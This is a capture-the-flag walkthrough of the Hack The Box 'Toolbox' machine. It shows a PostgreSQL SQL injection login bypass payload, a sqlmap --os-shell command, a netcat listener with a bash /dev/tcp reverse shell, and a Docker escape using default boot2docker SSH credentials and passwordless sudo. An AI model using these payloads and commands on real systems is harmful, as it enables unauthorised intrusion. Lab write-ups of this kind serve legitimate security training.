Hackthebox - Toolbox
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Let's add admin.megalogistic.com
and megalogistic.com
to our hosts file.
Anonymous FTP is allowed and we have on file on the target. Let's take it curl --user anonymous:anonymous -o docker-toolbox.exe
If we go to https://admin.megalogistic.com/ we have a login panel
If we put a quote in the user field we can generate a sql error
It is using pg_query
so it is postgres sql.
Let's try to do the most common bypass authentication payload except we translate it in postgresql this does the trick username='+or+1=1--&password=aaa
In the browser it looks like this
If we google the "uplusion23" we find a github user https://github.com/uplusion23. if we have a look at his github page https://uplusion23.github.io/ we find his portfolio and then we can have a look at the admin panel on CodePen here
We have a todo list and a list of users
If we use sqlmap we can get a shell on the target sqlmap -r request -p username --os-shell
To get the request file we just need to right click in the burp request and select save item
We also find an .ssh folder with a known_hosts file
We can try to add our pu
Something weird is that if we cat /etc/passwd we do not find the user tony we found in /home. However the folder tony belongs to root so our root user might be named tony
Also this seems to be a docker instance.
Let's get a reverse shell we set a listener rlwrap nc -nlvp 1234
this way we will get a more verbose shell in case of errors
then we launch this from our previous prompt bash -c 'bash -i >& /dev/tcp/ 0>&1'
uname -a gives command standard output: 'Linux bc56e3cc55e9 4.14.154-boot2docker #1 SMP Thu Nov 14 19:19:08 UTC 2019 x86_64 GNU/Linux'
so we loopback to this boot2docker
We know it uses this docker: https://github.com/boot2docker/boot2docker
So If we want to escape docker we can ssh as docker to ssh docker@
(we can check ifconfig for this)
We get a shell this way (the users and pass are in the git above)
The difficulty here is that we need to upgrade our shell and be quick because we loose the shell every few minutes.
Here is how to upgrade our shell (thanks to my friend Brianlane for the support on this part)
When we loose our shell and need to get it back we can repeat these steps just this way
And ssh again ssh docker@
If we sudo -l
we can see that it allows to sudo su
without having to enter any password.
The flag is not in the root folder
Here is the shell we get
If we ls on hone we have a user named tony.
When looking around a little we find the user flag /var/lib/postgresql/user.txt
If we go back we find a c directory with a Users folder in it that looks a lot like a win file system
If we go to Administrator/Desktop we can get the root flag